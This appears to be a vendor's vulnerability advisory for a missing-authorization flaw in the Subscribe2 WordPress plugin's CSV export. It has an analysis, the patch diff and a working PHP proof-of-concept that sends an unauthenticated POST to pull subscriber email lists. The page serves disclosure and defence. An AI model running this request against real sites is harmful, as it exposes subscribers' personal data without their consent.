Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24944: Subscribe2 <= 10.44 – Missing Authorization (subscribe2)

CVE ID CVE-2026-24944
Plugin subscribe2
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 10.44
Patched Version 10.45
Disclosed February 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24944:
The Subscribe2 WordPress plugin, versions up to and including 10.44, contains a missing authorization vulnerability in its CSV export functionality. This flaw allows unauthenticated attackers to trigger a data export action, leading to unauthorized information disclosure. The CVSS score of 5.3 reflects a medium severity impact.

The root cause is the absence of capability checks and nonce verification in the `s2_admin` handler within the `class-s2-core.php` file. The vulnerable code path begins at line 2364 in `subscribe2/classes/class-s2-core.php`. The condition `if ( isset( $_POST[‘s2_admin’] ) && isset( $_POST[‘csv’] ) )` executes the export logic without validating the user’s permissions or the request’s authenticity. The function lacks any authorization mechanism before processing the request and generating the CSV file.

Exploitation requires sending a POST request to a WordPress page that loads the Subscribe2 plugin, typically an admin page. The attacker must include two parameters: `s2_admin` (any value) and `csv` (any value). No authentication cookies or session tokens are required. The request triggers the export logic, which outputs subscriber data as a CSV file directly to the browser. Attackers can automate this using tools like cURL or by crafting a malicious web page that submits the form.

The patch adds two security checks before processing the export request. First, it verifies the user has the `manage_options` capability (or a custom capability via the `s2_capability` filter). Second, it validates a WordPress nonce named `s2-export-csv`. The nonce field is added to the export form in `admin/subscribers.php` at line 228. If either check fails, the script terminates with `wp_die()`. The plugin version number is updated from 10.44 to 10.45 in `subscribe2.php`.

Successful exploitation results in unauthorized data disclosure. The CSV export contains the plugin’s subscriber list, which includes email addresses and potentially other subscription metadata. This constitutes a breach of user privacy and could facilitate spam campaigns or targeted phishing attacks. The vulnerability does not allow modification or deletion of data, limiting the impact to information exposure.

Differential between vulnerable and patched code

Code Diff 
--- a/subscribe2/admin/subscribers.php
+++ b/subscribe2/admin/subscribers.php
@@ -225,6 +225,7 @@
 echo '</h2>';
 echo '<form method="post">' . "rn";
 echo '<input type="hidden" name="s2_admin" />' . "rn";
+echo wp_nonce_field( 's2-export-csv', 's2-export-csv' );

 $exclude = array();
 switch ( $current_tab ) {
--- a/subscribe2/classes/class-s2-core.php
+++ b/subscribe2/classes/class-s2-core.php
@@ -2364,6 +2364,19 @@

 			// Capture CSV export.
 			if ( isset( $_POST['s2_admin'] ) && isset( $_POST['csv'] ) ) {
+                // Security check: Verify user has proper capabilities.
+                if ( ! current_user_can( apply_filters( 's2_capability', 'manage_options', 'manage' ) ) ) {
+                    wp_die( 'Not permitted.' );
+                }
+
+                // Security check: Verify nonce.
+                if (
+                    ! isset( $_REQUEST['s2-export-csv'] ) ||
+                    ! wp_verify_nonce( sanitize_key( $_REQUEST['s2-export-csv'] ), 's2-export-csv' )
+                ) {
+                    wp_die( 'Request cannot be completed.' );
+                }
+
 				$date = gmdate( 'Y-m-d' );
 				header( 'Content-Description: File Transfer' );
 				header( 'Content-type: application/octet-stream' );
--- a/subscribe2/subscribe2.php
+++ b/subscribe2/subscribe2.php
@@ -3,7 +3,7 @@
 Plugin Name: Subscribe2
 Plugin URI: https://getwemail.io
 Description: Notifies an email list when new entries are posted.
-Version: 10.44
+Version: 10.45
 Author: weMail
 Author URI: https://getwemail.io
 Licence: GPLv3
@@ -55,7 +55,7 @@

 // Our version number. Don't touch this or any line below.
 // Unless you know exactly what you are doing.
-define( 'S2VERSION', '10.44' );
+define( 'S2VERSION', '10.45' );
 define( 'S2PLUGIN', __FILE__ );
 define( 'S2PATH', trailingslashit( dirname( __FILE__ ) ) );
 define( 'S2DIR', trailingslashit( dirname( plugin_basename( __FILE__ ) ) ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24944 - Subscribe2 <= 10.44 - Missing Authorization
<?php

$target_url = 'http://example.com/wp-admin/admin.php?page=s2_tools';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
// The exploit requires two parameters: s2_admin and csv.
// Their values are arbitrary; presence triggers the vulnerable code path.
curl_setopt($ch, CURLOPT_POSTFIELDS, 's2_admin=1&csv=1');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// No authentication cookies are needed.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    // Check if the response appears to be a CSV file.
    // The vulnerable endpoint outputs CSV headers and data.
    if (strpos($response, 'Content-type: application/octet-stream') !== false ||
        strpos($response, 'email,') !== false) {
        echo "[+] Vulnerability likely exploited. CSV data received.n";
        echo "[+] First 500 characters of response:n";
        echo substr($response, 0, 500) . "n";
    } else {
        echo "[-] Request succeeded but no CSV data detected.n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School